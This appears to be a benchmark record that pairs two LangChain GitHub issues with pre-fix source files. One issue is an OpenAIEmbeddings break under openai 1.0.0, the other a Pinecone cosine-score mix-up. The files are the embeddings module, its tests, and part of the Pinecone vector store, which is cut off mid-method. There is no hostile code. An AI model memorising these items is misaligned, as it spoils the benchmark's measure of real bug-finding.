OpenAIEmbeddings() does not work because of these bugs
### System Info Python Version: 3.11 LangChain Version: 0.0.331 OpenAI Version: 1.0.0 ### Who can help? @hwchase17, @agola11, @eyurtsev ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction The following error has been caused due to the recent change in version of OpenAI to 1.0.0 **Use OpenAI==0.28.1 to fix this error** With the code: `embeddings = OpenAIEmbeddings()` The error produced is: `AttributeError: module 'openai' has no attribute 'Embedding'. Did you mean: 'embeddings'?` I went through the `langchain/embeddings/openai.py` file and then changed `value["client"] = openai.Embedding` to `value["client"] = openai.embeddings`, but then I receive this new error: `AttributeError: module 'openai' has no attribute 'error'` in the same file (`langchain/embeddings/openai.py`) ### Expected behavior There should be no error when calling this function.
https://github.com/langchain-ai/langchain/issues/12943
https://github.com/langchain-ai/langchain/pull/12969
fdbb45d79e69485e0892dadf48b32dc8efadde9b
0c81cd923e04bb68fdf3ad299946d7fa85a21f9f
"2023-11-06T17:56:29Z"
python
"2023-11-07T02:52:33Z"
libs/langchain/langchain/embeddings/openai.py
from __future__ import annotations import logging import warnings from typing import ( Any, Callable, Dict, List, Literal, Optional, Sequence, Set, Tuple, Union, ) import numpy as np from tenacity import ( AsyncRetrying, before_sleep_log, retry, retry_if_exception_type, stop_after_attempt, wait_exponential, ) from langchain.pydantic_v1 import BaseModel, Extra, Field, root_validator from langchain.schema.embeddings import Embeddings from langchain.utils import get_from_dict_or_env, get_pydantic_field_names logger = logging.getLogger(__name__) def _create_retry_decorator(embeddings: OpenAIEmbeddings) -> Callable[[Any], Any]: import openai min_seconds = 4 max_seconds = 10 # Wait 2^x * 1 second between each retry starting with # 4 seconds, then up to 10 seconds, then 10 seconds afterwards return retry( reraise=True, stop=stop_after_attempt(embeddings.max_retries), wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds), retry=( retry_if_exception_type(openai.error.Timeout) | retry_if_exception_type(openai.error.APIError) | retry_if_exception_type(openai.error.APIConnectionError) | retry_if_exception_type(openai.error.RateLimitError) | retry_if_exception_type(openai.error.ServiceUnavailableError) ), before_sleep=before_sleep_log(logger, logging.WARNING), ) def _async_retry_decorator(embeddings: OpenAIEmbeddings) -> Any: import openai min_seconds = 4 max_seconds = 10 # Wait 2^x * 1 second between each retry starting with # 4 seconds, then up to 10 seconds, then 10 seconds afterwards async_retrying = AsyncRetrying( reraise=True, stop=stop_after_attempt(embeddings.max_retries), wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds), retry=( retry_if_exception_type(openai.error.Timeout) | retry_if_exception_type(openai.error.APIError) | retry_if_exception_type(openai.error.APIConnectionError) | retry_if_exception_type(openai.error.RateLimitError) | retry_if_exception_type(openai.error.ServiceUnavailableError) ), before_sleep=before_sleep_log(logger, logging.WARNING), ) def wrap(func: Callable) -> Callable: async def wrapped_f(*args: Any, **kwargs: Any) -> Callable: async for _ in async_retrying: return await func(*args, **kwargs) raise AssertionError("this is unreachable") return wrapped_f return wrap # https://stackoverflow.com/questions/76469415/getting-embeddings-of-length-1-from-langchain-openaiembeddings def _check_response(response: dict, skip_empty: bool = False) -> dict: if any(len(d["embedding"]) == 1 for d in response["data"]) and not skip_empty: import openai raise openai.error.APIError("OpenAI API returned an empty embedding") return response def embed_with_retry(embeddings: OpenAIEmbeddings, **kwargs: Any) -> Any: """Use tenacity to retry the embedding call.""" retry_decorator = _create_retry_decorator(embeddings) @retry_decorator def _embed_with_retry(**kwargs: Any) -> Any: response = embeddings.client.create(**kwargs) return _check_response(response, skip_empty=embeddings.skip_empty) return _embed_with_retry(**kwargs) async def async_embed_with_retry(embeddings: OpenAIEmbeddings, **kwargs: Any) -> Any: """Use tenacity to retry the embedding call.""" @_async_retry_decorator(embeddings) async def _async_embed_with_retry(**kwargs: Any) -> Any: response = await embeddings.client.acreate(**kwargs) return _check_response(response, skip_empty=embeddings.skip_empty) return await _async_embed_with_retry(**kwargs) class OpenAIEmbeddings(BaseModel, Embeddings): """OpenAI embedding models. To use, you should have the ``openai`` python package installed, and the environment variable ``OPENAI_API_KEY`` set with your API key or pass it as a named parameter to the constructor. Example: .. code-block:: python from langchain.embeddings import OpenAIEmbeddings openai = OpenAIEmbeddings(openai_api_key="my-api-key") In order to use the library with Microsoft Azure endpoints, you need to set the OPENAI_API_TYPE, OPENAI_API_BASE, OPENAI_API_KEY and OPENAI_API_VERSION. The OPENAI_API_TYPE must be set to 'azure' and the others correspond to the properties of your endpoint. In addition, the deployment name must be passed as the model parameter. Example: .. code-block:: python import os os.environ["OPENAI_API_TYPE"] = "azure" os.environ["OPENAI_API_BASE"] = "https://<your-endpoint.openai.azure.com/" os.environ["OPENAI_API_KEY"] = "your AzureOpenAI key" os.environ["OPENAI_API_VERSION"] = "2023-05-15" os.environ["OPENAI_PROXY"] = "http://your-corporate-proxy:8080" from langchain.embeddings.openai import OpenAIEmbeddings embeddings = OpenAIEmbeddings( deployment="your-embeddings-deployment-name", model="your-embeddings-model-name", openai_api_base="https://your-endpoint.openai.azure.com/", openai_api_type="azure", ) text = "This is a test query." query_result = embeddings.embed_query(text) """ client: Any = None #: :meta private: model: str = "text-embedding-ada-002" deployment: str = model # to support Azure OpenAI Service custom deployment names openai_api_version: Optional[str] = None # to support Azure OpenAI Service custom endpoints openai_api_base: Optional[str] = None # to support Azure OpenAI Service custom endpoints openai_api_type: Optional[str] = None # to support explicit proxy for OpenAI openai_proxy: Optional[str] = None embedding_ctx_length: int = 8191 """The maximum number of tokens to embed at once.""" openai_api_key: Optional[str] = None openai_organization: Optional[str] = None allowed_special: Union[Literal["all"], Set[str]] = set() disallowed_special: Union[Literal["all"], Set[str], Sequence[str]] = "all" chunk_size: int = 1000 """Maximum number of texts to embed in each batch""" max_retries: int = 6 """Maximum number of retries to make when generating.""" request_timeout: Optional[Union[float, Tuple[float, float]]] = None """Timeout in seconds for the OpenAPI request.""" headers: Any = None tiktoken_model_name: Optional[str] = None """The model name to pass to tiktoken when using this class. Tiktoken is used to count the number of tokens in documents to constrain them to be under a certain limit. By default, when set to None, this will be the same as the embedding model name. However, there are some cases where you may want to use this Embedding class with a model name not supported by tiktoken. This can include when using Azure embeddings or when using one of the many model providers that expose an OpenAI-like API but with different models. In those cases, in order to avoid erroring when tiktoken is called, you can specify a model name to use here.""" show_progress_bar: bool = False """Whether to show a progress bar when embedding.""" model_kwargs: Dict[str, Any] = Field(default_factory=dict) """Holds any model parameters valid for `create` call not explicitly specified.""" skip_empty: bool = False """Whether to skip empty strings when embedding or raise an error. Defaults to not skipping.""" class Config: """Configuration for this pydantic object.""" extra = Extra.forbid @root_validator(pre=True) def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]: """Build extra kwargs from additional params that were passed in.""" all_required_field_names = get_pydantic_field_names(cls) extra = values.get("model_kwargs", {}) for field_name in list(values): if field_name in extra: raise ValueError(f"Found {field_name} supplied twice.") if field_name not in all_required_field_names: warnings.warn( f"""WARNING! {field_name} is not default parameter. {field_name} was transferred to model_kwargs. Please confirm that {field_name} is what you intended.""" ) extra[field_name] = values.pop(field_name) invalid_model_kwargs = all_required_field_names.intersection(extra.keys()) if invalid_model_kwargs: raise ValueError( f"Parameters {invalid_model_kwargs} should be specified explicitly. " f"Instead they were passed in as part of `model_kwargs` parameter." ) values["model_kwargs"] = extra return values @root_validator(pre=True) def validate_environment(cls, values: Dict) -> Dict: """Validate that api key and python package exists in environment.""" values["openai_api_key"] = get_from_dict_or_env( values, "openai_api_key", "OPENAI_API_KEY" ) values["openai_api_base"] = get_from_dict_or_env( values, "openai_api_base", "OPENAI_API_BASE", default="", ) values["openai_api_type"] = get_from_dict_or_env( values, "openai_api_type", "OPENAI_API_TYPE", default="", ) values["openai_proxy"] = get_from_dict_or_env( values, "openai_proxy", "OPENAI_PROXY", default="", ) if values["openai_api_type"] in ("azure", "azure_ad", "azuread"): default_api_version = "2022-12-01" # Azure OpenAI embedding models allow a maximum of 16 texts # at a time in each batch # See: https://learn.microsoft.com/en-us/azure/ai-services/openai/reference#embeddings default_chunk_size = 16 else: default_api_version = "" default_chunk_size = 1000 values["openai_api_version"] = get_from_dict_or_env( values, "openai_api_version", "OPENAI_API_VERSION", default=default_api_version, ) values["openai_organization"] = get_from_dict_or_env( values, "openai_organization", "OPENAI_ORGANIZATION", default="", ) if "chunk_size" not in values: values["chunk_size"] = default_chunk_size try: import openai values["client"] = openai.Embedding except ImportError: raise ImportError( "Could not import openai python package. " "Please install it with `pip install openai`." ) return values @property def _invocation_params(self) -> Dict: openai_args = { "model": self.model, "request_timeout": self.request_timeout, "headers": self.headers, "api_key": self.openai_api_key, "organization": self.openai_organization, "api_base": self.openai_api_base, "api_type": self.openai_api_type, "api_version": self.openai_api_version, **self.model_kwargs, } if self.openai_api_type in ("azure", "azure_ad", "azuread"): openai_args["engine"] = self.deployment if self.openai_proxy: try: import openai except ImportError: raise ImportError( "Could not import openai python package. " "Please install it with `pip install openai`." ) openai.proxy = { "http": self.openai_proxy, "https": self.openai_proxy, } # type: ignore[assignment] # noqa: E501 return openai_args # please refer to # https://github.com/openai/openai-cookbook/blob/main/examples/Embedding_long_inputs.ipynb def _get_len_safe_embeddings( self, texts: List[str], *, engine: str, chunk_size: Optional[int] = None ) -> List[List[float]]: embeddings: List[List[float]] = [[] for _ in range(len(texts))] try: import tiktoken except ImportError: raise ImportError( "Could not import tiktoken python package. " "This is needed in order to for OpenAIEmbeddings. " "Please install it with `pip install tiktoken`." ) tokens = [] indices = [] model_name = self.tiktoken_model_name or self.model try: encoding = tiktoken.encoding_for_model(model_name) except KeyError: logger.warning("Warning: model not found. Using cl100k_base encoding.") model = "cl100k_base" encoding = tiktoken.get_encoding(model) for i, text in enumerate(texts): if self.model.endswith("001"): # See: https://github.com/openai/openai-python/issues/418#issuecomment-1525939500 # replace newlines, which can negatively affect performance. text = text.replace("\n", " ") token = encoding.encode( text, allowed_special=self.allowed_special, disallowed_special=self.disallowed_special, ) for j in range(0, len(token), self.embedding_ctx_length): tokens.append(token[j : j + self.embedding_ctx_length]) indices.append(i) batched_embeddings: List[List[float]] = [] _chunk_size = chunk_size or self.chunk_size if self.show_progress_bar: try: from tqdm.auto import tqdm _iter = tqdm(range(0, len(tokens), _chunk_size)) except ImportError: _iter = range(0, len(tokens), _chunk_size) else: _iter = range(0, len(tokens), _chunk_size) for i in _iter: response = embed_with_retry( self, input=tokens[i : i + _chunk_size], **self._invocation_params, ) batched_embeddings.extend(r["embedding"] for r in response["data"]) results: List[List[List[float]]] = [[] for _ in range(len(texts))] num_tokens_in_batch: List[List[int]] = [[] for _ in range(len(texts))] for i in range(len(indices)): if self.skip_empty and len(batched_embeddings[i]) == 1: continue results[indices[i]].append(batched_embeddings[i]) num_tokens_in_batch[indices[i]].append(len(tokens[i])) for i in range(len(texts)): _result = results[i] if len(_result) == 0: average = embed_with_retry( self, input="", **self._invocation_params, )["data"][0]["embedding"] else: average = np.average(_result, axis=0, weights=num_tokens_in_batch[i]) embeddings[i] = (average / np.linalg.norm(average)).tolist() return embeddings # please refer to # https://github.com/openai/openai-cookbook/blob/main/examples/Embedding_long_inputs.ipynb async def _aget_len_safe_embeddings( self, texts: List[str], *, engine: str, chunk_size: Optional[int] = None ) -> List[List[float]]: embeddings: List[List[float]] = [[] for _ in range(len(texts))] try: import tiktoken except ImportError: raise ImportError( "Could not import tiktoken python package. " "This is needed in order to for OpenAIEmbeddings. " "Please install it with `pip install tiktoken`." ) tokens = [] indices = [] model_name = self.tiktoken_model_name or self.model try: encoding = tiktoken.encoding_for_model(model_name) except KeyError: logger.warning("Warning: model not found. Using cl100k_base encoding.") model = "cl100k_base" encoding = tiktoken.get_encoding(model) for i, text in enumerate(texts): if self.model.endswith("001"): # See: https://github.com/openai/openai-python/issues/418#issuecomment-1525939500 # replace newlines, which can negatively affect performance. text = text.replace("\n", " ") token = encoding.encode( text, allowed_special=self.allowed_special, disallowed_special=self.disallowed_special, ) for j in range(0, len(token), self.embedding_ctx_length): tokens.append(token[j : j + self.embedding_ctx_length]) indices.append(i) batched_embeddings: List[List[float]] = [] _chunk_size = chunk_size or self.chunk_size for i in range(0, len(tokens), _chunk_size): response = await async_embed_with_retry( self, input=tokens[i : i + _chunk_size], **self._invocation_params, ) batched_embeddings.extend(r["embedding"] for r in response["data"]) results: List[List[List[float]]] = [[] for _ in range(len(texts))] num_tokens_in_batch: List[List[int]] = [[] for _ in range(len(texts))] for i in range(len(indices)): results[indices[i]].append(batched_embeddings[i]) num_tokens_in_batch[indices[i]].append(len(tokens[i])) for i in range(len(texts)): _result = results[i] if len(_result) == 0: average = ( await async_embed_with_retry( self, input="", **self._invocation_params, ) )["data"][0]["embedding"] else: average = np.average(_result, axis=0, weights=num_tokens_in_batch[i]) embeddings[i] = (average / np.linalg.norm(average)).tolist() return embeddings def embed_documents( self, texts: List[str], chunk_size: Optional[int] = 0 ) -> List[List[float]]: """Call out to OpenAI's embedding endpoint for embedding search docs. Args: texts: The list of texts to embed. chunk_size: The chunk size of embeddings. If None, will use the chunk size specified by the class. Returns: List of embeddings, one for each text. """ # NOTE: to keep things simple, we assume the list may contain texts longer # than the maximum context and use length-safe embedding function. return self._get_len_safe_embeddings(texts, engine=self.deployment) async def aembed_documents( self, texts: List[str], chunk_size: Optional[int] = 0 ) -> List[List[float]]: """Call out to OpenAI's embedding endpoint async for embedding search docs. Args: texts: The list of texts to embed. chunk_size: The chunk size of embeddings. If None, will use the chunk size specified by the class. Returns: List of embeddings, one for each text. """ # NOTE: to keep things simple, we assume the list may contain texts longer # than the maximum context and use length-safe embedding function. return await self._aget_len_safe_embeddings(texts, engine=self.deployment) def embed_query(self, text: str) -> List[float]: """Call out to OpenAI's embedding endpoint for embedding query text. Args: text: The text to embed. Returns: Embedding for the text. """ return self.embed_documents([text])[0] async def aembed_query(self, text: str) -> List[float]: """Call out to OpenAI's embedding endpoint async for embedding query text. Args: text: The text to embed. Returns: Embedding for the text. """ embeddings = await self.aembed_documents([text]) return embeddings[0]
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
12,943
OpenAIEmbeddings() does not work because of these bugs
### System Info Python Version: 3.11 LangChain Version: 0.0.331 OpenAI Version: 1.0.0 ### Who can help? @hwchase17, @agola11, @eyurtsev ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction The following error has been caused due to the recent change in version of OpenAI to 1.0.0 **Use OpenAI==0.28.1 to fix this error** With the code: `embeddings = OpenAIEmbeddings()` The error produced is: `AttributeError: module 'openai' has no attribute 'Embedding'. Did you mean: 'embeddings'?` I went through the `langchain/embeddings/openai.py` file and then changed `value["client"] = openai.Embedding` to `value["client"] = openai.embeddings`, but then I receive this new error: `AttributeError: module 'openai' has no attribute 'error'` in the same file (`langchain/embeddings/openai.py`) ### Expected behavior There should be no error when calling this function.
https://github.com/langchain-ai/langchain/issues/12943
https://github.com/langchain-ai/langchain/pull/12969
fdbb45d79e69485e0892dadf48b32dc8efadde9b
0c81cd923e04bb68fdf3ad299946d7fa85a21f9f
"2023-11-06T17:56:29Z"
python
"2023-11-07T02:52:33Z"
libs/langchain/tests/integration_tests/embeddings/test_openai.py
"""Test openai embeddings.""" import os import numpy as np import openai import pytest from langchain.embeddings.openai import OpenAIEmbeddings @pytest.mark.scheduled def test_openai_embedding_documents() -> None: """Test openai embeddings.""" documents = ["foo bar"] embedding = OpenAIEmbeddings() output = embedding.embed_documents(documents) assert len(output) == 1 assert len(output[0]) == 1536 @pytest.mark.scheduled def test_openai_embedding_documents_multiple() -> None: """Test openai embeddings.""" documents = ["foo bar", "bar foo", "foo"] embedding = OpenAIEmbeddings(chunk_size=2) embedding.embedding_ctx_length = 8191 output = embedding.embed_documents(documents) assert len(output) == 3 assert len(output[0]) == 1536 assert len(output[1]) == 1536 assert len(output[2]) == 1536 @pytest.mark.scheduled @pytest.mark.asyncio async def test_openai_embedding_documents_async_multiple() -> None: """Test openai embeddings.""" documents = ["foo bar", "bar foo", "foo"] embedding = OpenAIEmbeddings(chunk_size=2) embedding.embedding_ctx_length = 8191 output = await embedding.aembed_documents(documents) assert len(output) == 3 assert len(output[0]) == 1536 assert len(output[1]) == 1536 assert len(output[2]) == 1536 @pytest.mark.scheduled def test_openai_embedding_query() -> None: """Test openai embeddings.""" document = "foo bar" embedding = OpenAIEmbeddings() output = embedding.embed_query(document) assert len(output) == 1536 @pytest.mark.scheduled @pytest.mark.asyncio async def test_openai_embedding_async_query() -> None: """Test openai embeddings.""" document = "foo bar" embedding = OpenAIEmbeddings() output = await embedding.aembed_query(document) assert len(output) == 1536 @pytest.mark.skip(reason="Unblock scheduled testing. TODO: fix.") @pytest.mark.scheduled def test_openai_embedding_with_empty_string() -> None: """Test openai embeddings with empty string.""" document = ["", "abc"] embedding = OpenAIEmbeddings() output = embedding.embed_documents(document) assert len(output) == 2 assert len(output[0]) == 1536 expected_output = openai.Embedding.create(input="", model="text-embedding-ada-002")[ "data" ][0]["embedding"] assert np.allclose(output[0], expected_output) assert len(output[1]) == 1536 @pytest.mark.scheduled def test_embed_documents_normalized() -> None: output = OpenAIEmbeddings().embed_documents(["foo walked to the market"]) assert np.isclose(np.linalg.norm(output[0]), 1.0) @pytest.mark.scheduled def test_embed_query_normalized() -> None: output = OpenAIEmbeddings().embed_query("foo walked to the market") assert np.isclose(np.linalg.norm(output), 1.0) def test_azure_openai_embeddings() -> None: from openai import error os.environ["OPENAI_API_TYPE"] = "azure" os.environ["OPENAI_API_BASE"] = "https://your-endpoint.openai.azure.com/" os.environ["OPENAI_API_KEY"] = "your AzureOpenAI key" os.environ["OPENAI_API_VERSION"] = "2023-03-15-preview" embeddings = OpenAIEmbeddings(deployment="your-embeddings-deployment-name") text = "This is a test document." try: embeddings.embed_query(text) except error.InvalidRequestError as e: if "Must provide an 'engine' or 'deployment_id' parameter" in str(e): assert ( False ), "deployment was provided to but openai.Embeddings didn't get it." except Exception: # Expected to fail because endpoint doesn't exist. pass
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,207
Issue: Pinecone retriever with Cosine Similarity is treated like Cosine Distance
### Issue you'd like to raise. When using document search from the existing Pinecone index that was created using Cosine **Similarity** in the `ConversationalRetrievalChain`, the `score_theshold` would eliminate most relevant documents instead of least relevant ones because the _similarity_ metric will be converted to _distance_. In [_select_relevance_score_fn](https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/vectorstores/pinecone.py#L172) it calls the [_cosine_relevance_score_fn](https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/vectorstores/base.py#L169) - which converts the similarity returned from Pinecone search to distance. Then, [filtering the documents](https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/vectorstores/base.py#L266) based on the `score_threshold` eliminates the most relevant documents instead of least relevant ones. ### Suggestion: Pinecone subclass should override the `_cosine_relevance_score_fn` to preserve the similarity, since it is what originally comes back from the Pinecone similarity search.
https://github.com/langchain-ai/langchain/issues/8207
https://github.com/langchain-ai/langchain/pull/8920
2e42ed5de68d27fe0ce676aae0cdaae778fcf16c
ff19a62afc2c8d6d9e705bd0af5ffad426263f49
"2023-07-24T22:23:33Z"
python
"2023-11-13T19:47:38Z"
libs/langchain/langchain/vectorstores/pinecone.py
from __future__ import annotations import logging import uuid import warnings from typing import TYPE_CHECKING, Any, Callable, Iterable, List, Optional, Tuple, Union import numpy as np from langchain.docstore.document import Document from langchain.schema.embeddings import Embeddings from langchain.schema.vectorstore import VectorStore from langchain.utils.iter import batch_iterate from langchain.vectorstores.utils import DistanceStrategy, maximal_marginal_relevance if TYPE_CHECKING: from pinecone import Index logger = logging.getLogger(__name__) class Pinecone(VectorStore): """`Pinecone` vector store. To use, you should have the ``pinecone-client`` python package installed. Example: .. code-block:: python from langchain.vectorstores import Pinecone from langchain.embeddings.openai import OpenAIEmbeddings import pinecone # The environment should be the one specified next to the API key # in your Pinecone console pinecone.init(api_key="***", environment="...") index = pinecone.Index("langchain-demo") embeddings = OpenAIEmbeddings() vectorstore = Pinecone(index, embeddings.embed_query, "text") """ def __init__( self, index: Any, embedding: Union[Embeddings, Callable], text_key: str, namespace: Optional[str] = None, distance_strategy: Optional[DistanceStrategy] = DistanceStrategy.COSINE, ): """Initialize with Pinecone client.""" try: import pinecone except ImportError: raise ImportError( "Could not import pinecone python package. " "Please install it with `pip install pinecone-client`." ) if not isinstance(embedding, Embeddings): warnings.warn( "Passing in `embedding` as a Callable is deprecated. Please pass in an" " Embeddings object instead." ) if not isinstance(index, pinecone.index.Index): raise ValueError( f"client should be an instance of pinecone.index.Index, " f"got {type(index)}" ) self._index = index self._embedding = embedding self._text_key = text_key self._namespace = namespace self.distance_strategy = distance_strategy @property def embeddings(self) -> Optional[Embeddings]: """Access the query embedding object if available.""" if isinstance(self._embedding, Embeddings): return self._embedding return None def _embed_documents(self, texts: Iterable[str]) -> List[List[float]]: """Embed search docs.""" if isinstance(self._embedding, Embeddings): return self._embedding.embed_documents(list(texts)) return [self._embedding(t) for t in texts] def _embed_query(self, text: str) -> List[float]: """Embed query text.""" if isinstance(self._embedding, Embeddings): return self._embedding.embed_query(text) return self._embedding(text) def add_texts( self, texts: Iterable[str], metadatas: Optional[List[dict]] = None, ids: Optional[List[str]] = None, namespace: Optional[str] = None, batch_size: int = 32, embedding_chunk_size: int = 1000, **kwargs: Any, ) -> List[str]: """Run more texts through the embeddings and add to the vectorstore. Upsert optimization is done by chunking the embeddings and upserting them. This is done to avoid memory issues and optimize using HTTP based embeddings. For OpenAI embeddings, use pool_threads>4 when constructing the pinecone.Index, embedding_chunk_size>1000 and batch_size~64 for best performance. Args: texts: Iterable of strings to add to the vectorstore. metadatas: Optional list of metadatas associated with the texts. ids: Optional list of ids to associate with the texts. namespace: Optional pinecone namespace to add the texts to. batch_size: Batch size to use when adding the texts to the vectorstore. embedding_chunk_size: Chunk size to use when embedding the texts. Returns: List of ids from adding the texts into the vectorstore. """ if namespace is None: namespace = self._namespace texts = list(texts) ids = ids or [str(uuid.uuid4()) for _ in texts] metadatas = metadatas or [{} for _ in texts] for metadata, text in zip(metadatas, texts): metadata[self._text_key] = text # For loops to avoid memory issues and optimize when using HTTP based embeddings # The first loop runs the embeddings, it benefits when using OpenAI embeddings # The second loops runs the pinecone upsert asynchronously. for i in range(0, len(texts), embedding_chunk_size): chunk_texts = texts[i : i + embedding_chunk_size] chunk_ids = ids[i : i + embedding_chunk_size] chunk_metadatas = metadatas[i : i + embedding_chunk_size] embeddings = self._embed_documents(chunk_texts) async_res = [ self._index.upsert( vectors=batch, namespace=namespace, async_req=True, **kwargs, ) for batch in batch_iterate( batch_size, zip(chunk_ids, embeddings, chunk_metadatas) ) ] [res.get() for res in async_res] return ids def similarity_search_with_score( self, query: str, k: int = 4, filter: Optional[dict] = None, namespace: Optional[str] = None, ) -> List[Tuple[Document, float]]: """Return pinecone documents most similar to query, along with scores. Args: query: Text to look up documents similar to. k: Number of Documents to return. Defaults to 4. filter: Dictionary of argument(s) to filter on metadata namespace: Namespace to search in. Default will search in '' namespace. Returns: List of Documents most similar to the query and score for each """ return self.similarity_search_by_vector_with_score( self._embed_query(query), k=k, filter=filter, namespace=namespace ) def similarity_search_by_vector_with_score( self, embedding: List[float], *, k: int = 4, filter: Optional[dict] = None, namespace: Optional[str] = None, ) -> List[Tuple[Document, float]]: """Return pinecone documents most similar to embedding, along with scores.""" if namespace is None: namespace = self._namespace docs = [] results = self._index.query( [embedding], top_k=k, include_metadata=True, namespace=namespace, filter=filter, ) for res in results["matches"]: metadata = res["metadata"] if self._text_key in metadata: text = metadata.pop(self._text_key) score = res["score"] docs.append((Document(page_content=text, metadata=metadata), score)) else: logger.warning( f"Found document with no `{self._text_key}` key. Skipping." ) return docs def similarity_search( self, query: str, k: int = 4, filter: Optional[dict] = None, namespace: Optional[str] = None, **kwargs: Any, ) -> List[Document]: """Return pinecone documents most similar to query. Args: query: Text to look up documents similar to. k: Number of Documents to return. Defaults to 4. filter: Dictionary of argument(s) to filter on metadata namespace: Namespace to search in. Default will search in '' namespace. Returns: List of Documents most similar to the query and score for each """ docs_and_scores = self.similarity_search_with_score( query, k=k, filter=filter, namespace=namespace, **kwargs ) return [doc for doc, _ in docs_and_scores] def _select_relevance_score_fn(self) -> Callable[[float], float]: """ The 'correct' relevance function may differ depending on a few things, including: - the distance / similarity metric used by the VectorStore - the scale of your embeddings (OpenAI's are unit normed. Many others are not!) - embedding dimensionality - etc. """ if self.distance_strategy == DistanceStrategy.COSINE: return self._cosine_relevance_score_fn elif self.distance_strategy == DistanceStrategy.MAX_INNER_PRODUCT: return self._max_inner_product_relevance_score_fn elif self.distance_strategy == DistanceStrategy.EUCLIDEAN_DISTANCE: return self._euclidean_relevance_score_fn else: raise ValueError( "Unknown distance strategy, must be cosine, max_inner_product " "(dot product), or euclidean" ) def max_marginal_relevance_search_by_vector( self, embedding: List[float], k: int = 4, fetch_k: int = 20, lambda_mult: float = 0.5, filter: Optional[dict] = None, namespace: Optional[str] = None, **kwargs: Any, ) -> List[Document]: """Return docs selected using the maximal marginal relevance. Maximal marginal relevance optimizes for similarity to query AND diversity among selected documents. Args: embedding: Embedding to look up documents similar to. k: Number of Documents to return. Defaults to 4. fetch_k: Number of Documents to fetch to pass to MMR algorithm. lambda_mult: Number between 0 and 1 that determines the degree of diversity among the results with 0 corresponding to maximum diversity and 1 to minimum diversity. Defaults to 0.5. Returns: List of Documents selected by maximal marginal relevance. """ if namespace is None: namespace = self._namespace results = self._index.query( [embedding], top_k=fetch_k, include_values=True, include_metadata=True, namespace=namespace, filter=filter, ) mmr_selected = maximal_marginal_relevance( np.array([embedding], dtype=np.float32), [item["values"] for item in results["matches"]], k=k, lambda_mult=lambda_mult, ) selected = [results["matches"][i]["metadata"] for i in mmr_selected] return [ Document(page_content=metadata.pop((self._text_key)), metadata=metadata) for metadata in selected ] def max_marginal_relevance_search( self, query: str, k: int = 4, fetch_k: int = 20, lambda_mult: float = 0.5, filter: Optional[dict] = None, namespace: Optional[str] = None, **kwargs: Any, ) -> List[Document]: """Return docs selected using the maximal marginal relevance. Maximal marginal relevance optimizes for similarity to query AND diversity among selected documents. Args: query: Text to look up documents similar to. k: Number of Documents to return. Defaults to 4. fetch_k: Number of Documents to fetch to pass to MMR algorithm. lambda_mult: Number between 0 and 1 that determines the degree of diversity among the results with 0 corresponding to maximum diversity and 1 to minimum diversity. Defaults to 0.5. Returns: List of Documents selected by maximal marginal relevance. """ embedding = self._embed_query(query) return self.max_marginal_relevance_search_by_vector( embedding, k, fetch_k, lambda_mult, filter, namespace ) @classmethod def get_pinecone_index( cls, index_name: Optional[str], pool_threads: int = 4, ) -> Index: """Return a Pinecone Index instance. Args: index_name: Name of the index to use. pool_threads: Number of threads to use for index upsert. Returns: Pinecone Index instance.""" try: import pinecone except ImportError: raise ValueError( "Could not import pinecone python package. " "Please install it with `pip install pinecone-client`." ) indexes = pinecone.list_indexes() # checks if provided index exists if index_name in indexes: index = pinecone.Index(index_name, pool_threads=pool_threads) elif len(indexes) == 0: raise ValueError( "No active indexes found in your Pinecone project, " "are you sure you're using the right Pinecone API key and Environment? " "Please double check your Pinecone dashboard." ) else: raise ValueError( f"Index '{index_name}' not found in your Pinecone project. " f"Did you mean one of the following indexes: {', '.join(indexes)}" ) return index @classmethod def from_texts( cls, texts: List[str], embedding: Embeddings, metadatas: Optional[List[dict]] = None, ids: Optional[List[str]] = None, batch_size: int = 32, text_key: str = "text", namespace: Optional[str] = None, index_name: Optional[str] = None, upsert_kwargs: Optional[dict] = None, pool_threads: int = 4, embeddings_chunk_size: int = 1000, **kwargs: Any, ) -> Pinecone: """Construct Pinecone wrapper from raw documents. This is a user friendly interface that: 1. Embeds documents. 2. Adds the documents to a provided Pinecone index This is intended to be a quick way to get started. The `pool_threads` affects the speed of the upsert operations. Example: .. code-block:: python from langchain.vectorstores import Pinecone from langchain.embeddings import OpenAIEmbeddings import pinecone # The environment should be the one specified next to the API key # in your Pinecone console pinecone.init(api_key="***", environment="...") embeddings = OpenAIEmbeddings() pinecone = Pinecone.from_texts( texts, embeddings, index_name="langchain-demo" ) """ pinecone_index = cls.get_pinecone_index(index_name, pool_threads) pinecone = cls(pinecone_index, embedding, text_key, namespace, **kwargs) pinecone.add_texts( texts, metadatas=metadatas, ids=ids, namespace=namespace, batch_size=batch_size, embedding_chunk_size=embeddings_chunk_size, **(upsert_kwargs or {}), ) return pinecone @classmethod def from_existing_index( cls, index_name: str, embedding: Embeddings, text_key: str = "text", namespace: Optional[str] = None, pool_threads: int = 4, ) -> Pinecone: """Load pinecone vectorstore from index name.""" pinecone_index = cls.get_pinecone_index(index_name, pool_threads) return cls(pinecone_index, embedding, text_key, namespace) def delete( self, ids: Optional[List[str]] = None, delete_all: Optional[bool] = None, namespace: Optional[str] = None, filter: Optional[dict] = None, **kwargs: Any, ) -> None: """Delete by vector IDs or filter. Args: ids: List of ids to delete. filter: Dictionary of conditions to filter vectors to delete. """ if namespace is None: namespace = self._namespace if delete_all: self._index.delete(delete_all=True, namespace=namespace, **kwargs) elif ids is not None: chunk_size = 1000 